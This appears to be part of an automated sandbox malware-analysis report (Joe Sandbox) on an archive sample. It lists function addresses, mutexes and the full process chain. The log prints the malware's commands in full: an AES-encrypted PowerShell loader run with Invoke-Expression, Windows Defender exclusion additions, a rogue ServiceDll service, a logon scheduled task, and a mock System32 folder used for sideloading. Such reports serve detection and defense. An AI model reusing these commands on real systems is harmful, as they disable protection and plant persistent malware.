    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE856E046_2_00007FFA2CE856E0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE9985F46_2_00007FFA2CE9985F
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE3B83046_2_00007FFA2CE3B830
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE7F0F046_2_00007FFA2CE7F0F0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA92A046_2_00007FFA2CEA92A0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE7D26046_2_00007FFA2CE7D260
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2538046_2_00007FFA2CE25380
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8131046_2_00007FFA2CE81310
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE432C046_2_00007FFA2CE432C0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6F42046_2_00007FFA2CE6F420
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2740046_2_00007FFA2CE27400
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CF08D7046_2_00007FFA2CF08D70
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CF0E82046_2_00007FFA2CF0E820
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CF108B046_2_00007FFA2CF108B0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CF0DF0046_2_00007FFA2CF0DF00
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CF0E8E046_2_00007FFA2CF0E8E0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEF6AE046_2_00007FFA2CEF6AE0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CF0344046_2_00007FFA2CF03440
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA4188516C46_2_00007FFA4188516C
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA417ED72046_2_00007FFA417ED720
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA417F0B9046_2_00007FFA417F0B90
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA417EBFA046_2_00007FFA417EBFA0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA417CE24046_2_00007FFA417CE240
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA417D721046_2_00007FFA417D7210
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA4185014C46_2_00007FFA4185014C
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA4181D16046_2_00007FFA4181D160
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA418721B446_2_00007FFA418721B4
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA4186412C46_2_00007FFA4186412C
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA417F613046_2_00007FFA417F6130
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA417C448046_2_00007FFA417C4480
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA418403C046_2_00007FFA418403C0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA417EA3E046_2_00007FFA417EA3E0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA4182F38046_2_00007FFA4182F380
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA418052E046_2_00007FFA418052E0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA4185868446_2_00007FFA41858684
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA417FF5F046_2_00007FFA417FF5F0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA4187057446_2_00007FFA41870574
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA4187656446_2_00007FFA41876564
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA418025B046_2_00007FFA418025B0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA417D550046_2_00007FFA417D5500
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA4186151446_2_00007FFA41861514
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA417D688046_2_00007FFA417D6880
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA417DF8B046_2_00007FFA417DF8B0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA418497E046_2_00007FFA418497E0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA4187481846_2_00007FFA41874818
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA417FE81046_2_00007FFA417FE810
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA417C251046_2_00007FFA417C2510
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA4186171846_2_00007FFA41861718
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA4182F72046_2_00007FFA4182F720
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA4186472846_2_00007FFA41864728
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA41875A5446_2_00007FFA41875A54
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA41845A7046_2_00007FFA41845A70
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA417CDA9046_2_00007FFA417CDA90
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA418779C046_2_00007FFA418779C0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA417CE9E046_2_00007FFA417CE9E0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA417C4A0046_2_00007FFA417C4A00
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA4186192446_2_00007FFA41861924
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA417C3BF046_2_00007FFA417C3BF0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA41884C1446_2_00007FFA41884C14
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA41861B2846_2_00007FFA41861B28
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA417C6E5046_2_00007FFA417C6E50
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA417DBDF046_2_00007FFA417DBDF0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA41877D7046_2_00007FFA41877D70
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA417EED6046_2_00007FFA417EED60
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA41863CBC46_2_00007FFA41863CBC
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA41832CE046_2_00007FFA41832CE0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA41861D3446_2_00007FFA41861D34
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA417D0FF046_2_00007FFA417D0FF0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA417EDF8046_2_00007FFA417EDF80
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA41875EEC46_2_00007FFA41875EEC
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA41861F3846_2_00007FFA41861F38
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3310E3C051_2_00007FFA3310E3C0
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3312F43051_2_00007FFA3312F430
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3312B47051_2_00007FFA3312B470
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA330F238051_2_00007FFA330F2380
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA330F01D051_2_00007FFA330F01D0
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA330F118051_2_00007FFA330F1180
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3313318051_2_00007FFA33133180
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3313278051_2_00007FFA33132780
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3312B79051_2_00007FFA3312B790
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA330F261051_2_00007FFA330F2610
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA330FC62051_2_00007FFA330FC620
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3311666051_2_00007FFA33116660
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA330ED66051_2_00007FFA330ED660
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA331176B051_2_00007FFA331176B0
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA331284F051_2_00007FFA331284F0
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA331184C051_2_00007FFA331184C0
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3313453051_2_00007FFA33134530
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3313857051_2_00007FFA33138570
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA33116C3E51_2_00007FFA33116C3E
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA33101AC051_2_00007FFA33101AC0
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA330E2B2051_2_00007FFA330E2B20
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3311BA8051_2_00007FFA3311BA80
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3313BA8651_2_00007FFA3313BA86
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA330E7EE051_2_00007FFA330E7EE0
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA33118E6051_2_00007FFA33118E60
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA33125D0051_2_00007FFA33125D00
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA5112817D51_2_00007FFA5112817D
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA5112152051_2_00007FFA51121520
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA511277AB51_2_00007FFA511277AB
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA51122A1051_2_00007FFA51122A10
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA5112794B51_2_00007FFA5112794B
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA5112D08051_2_00007FFA5112D080
    Source: Joe Sandbox ViewDropped File: C:\Windows\System32\libcrypto-3-x64.dll DCC1FA1A341597DDB1476E3B5B3952456F07870A26FC30B0C6E6312764BAA1FC
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFA2CF176EA appears 38 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFA2CE583C0 appears 71 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFA2CE58330 appears 65 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFA2CEAE896 appears 148 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFA2CEAE8A2 appears 128 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFA2CEAE926 appears 36 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFA2CEAE10A appears 59 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFA2CEAE104 appears 461 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFA2CEAEDF0 appears 844 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFA2CEAE27E appears 39 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFA417C5170 appears 56 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFA2CEAE278 appears 32 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFA2CF11AB0 appears 77 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFA2CE68FD0 appears 105 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFA2CEAE1CA appears 1339 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFA2CF02CD0 appears 48 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFA2CEAE0FE appears 63 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFA2CF02D70 appears 260 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFA2CF02C50 appears 63 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFA4186D450 appears 310 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFA417C53A0 appears 31 times
    Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFA331203F0 appears 47 times
    Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFA331298E0 appears 82 times
    Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFA330F3190 appears 327 times
    Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFA33111800 appears 42 times
    Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFA33111920 appears 39 times
    Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFA330F32A0 appears 47 times
    Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFA33129870 appears 35 times
    Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFA330F30A0 appears 445 times
    Source: libiconv-2.dll.31.drStatic PE information: Number of sections : 20 > 10
    Source: libintl-9.dll.31.drStatic PE information: Number of sections : 20 > 10
    Source: libwinpthread-1.dll.31.drStatic PE information: Number of sections : 12 > 10
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f
    Source: Process Memory Space: powershell.exe PID: 3740, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: classification engineClassification label: mal100.expl.evad.win7Z@86/50@3/4
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CF13E00 LoadLibraryExA,GetLastError,memset,FormatMessageA,strerror,libintl_gettext,46_2_00007FFA2CF13E00
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1132:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3108:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4388:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1112:120:WilError_03
    Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6944:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5032:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1976:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2828:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5464:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4188:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6188:120:WilError_03
    Source: C:\Program Files\7-Zip\7zFM.exeFile created: C:\Users\user\AppData\Local\Temp\7zE4809A201Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rootdir\x615759.bat" "
    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\rootdir\x447823.vbs"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\explorer.exe
    Source: unknownProcess created: C:\Windows\explorer.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\explorer.exeJump to behavior
    Source: C:\Windows\System32\OpenWith.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\OpenWith.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: F.7zReversingLabs: Detection: 27%
    Source: F.7zVirustotal: Detection: 31%
    Source: svchost.exeString found in binary or memory: -start
    Source: svchost.exeString found in binary or memory: -addr
    Source: svchost.exeString found in binary or memory: ../../gettext-runtime/intl/loadmsgcat.c
    Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
    Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
    Source: unknownProcess created: C:\Program Files\7-Zip\7zFM.exe "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\user\Desktop\Fzip"
    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\rootdir\x447823.vbs"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rootdir\x615759.bat" "
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\explorer.exe explorer "..\USB Drive"
    Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy "C:\Windows\System32\printui.exe" "C:\Windows \System32" /Y
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy "x249569.dat" "C:\Windows \System32" /Y
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f && sc start x338625
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start x338625
    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k DcomLaunch
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
    Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /delete /tn "console_zero" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
    Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rootdir\x615759.bat" "Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\explorer.exe explorer "..\USB Drive"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy "C:\Windows\System32\printui.exe" "C:\Windows \System32" /YJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy "x249569.dat" "C:\Windows \System32" /YJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe" Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe" Jump to behavior
